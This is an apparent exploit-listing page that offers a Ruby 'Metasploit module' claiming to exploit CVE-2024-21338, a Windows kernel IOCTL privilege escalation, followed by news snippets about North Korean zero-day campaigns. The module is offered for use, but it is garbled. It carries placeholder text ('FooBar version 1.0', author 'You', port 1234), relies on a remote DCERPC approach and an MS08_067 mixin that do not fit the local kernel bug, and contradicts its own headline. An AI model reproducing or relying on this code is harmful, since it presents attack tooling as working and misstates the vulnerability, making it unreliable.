Headline
Microsoft Windows 10.0.17763.5458 Privilege Escalation
Microsoft Windows version 10.0.17763.5458 kernel IOCTL privilege escalation exploit.
############################################## Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 ### This module requires Metasploit: https://metasploit.com/download## Author : E1.Coders ## ## Contact : E1.Coders [at] Mail [dot] RU ## ## Security Risk : High ## ## ############################################## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact def initialize(info = {}) super( update_info( info, 'Name' => 'CVE-2024-21338 Exploit', 'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.', 'Author' => 'You', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2024-21338'] ] ) ) register_options( [ OptString.new('RHOST', [true, 'The target address', '127.0.0.1']), OptPort.new('RPORT', [true, 'The target port', 1234]) ] ) end def check connect begin impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar') rescue Rex::Post::Meterpreter::RequestError return Exploit::CheckCode::Safe end Exploit::CheckCode::Appears end def exploit connect begin impacket_artifact( dcerpc_binding('ncacn_ip_tcp'), 'FooBar', datastore['FooBarPayload'] ) rescue Rex::Post::Meterpreter::RequestError fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact' end handler disconnect endend #refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338Related news
A recently patched security flaw in Google Chrome and other Chromium web browsers was exploited as a zero-day by North Korean actors in a campaign designed to deliver the FudModule rootkit. The development is indicative of the persistent efforts made by the nation-state adversary, which had made a habit of incorporating rafts of Windows zero-day exploits into its arsenal in recent months.
A newly patched security flaw in Microsoft Windows was exploited as a zero-day by Lazarus Group, a prolific state-sponsored actor affiliated with North Korea. The security vulnerability, tracked as CVE-2024-38193 (CVSS score: 7.8), has been described as a privilege escalation bug in the Windows Ancillary Function Driver (AFD.sys) for WinSock. "An attacker who successfully exploited this
Hello everyone! In this episode, I will talk about the February updates of my open source projects, also about projects at my main job at Positive Technologies and interesting vulnerabilities. Alternative video link (for Russia): https://vk.com/video-149273431_456239140 Let’s start with my open source projects. Vulremi A simple vulnerability remediation utility, Vulremi, now has a logo and […]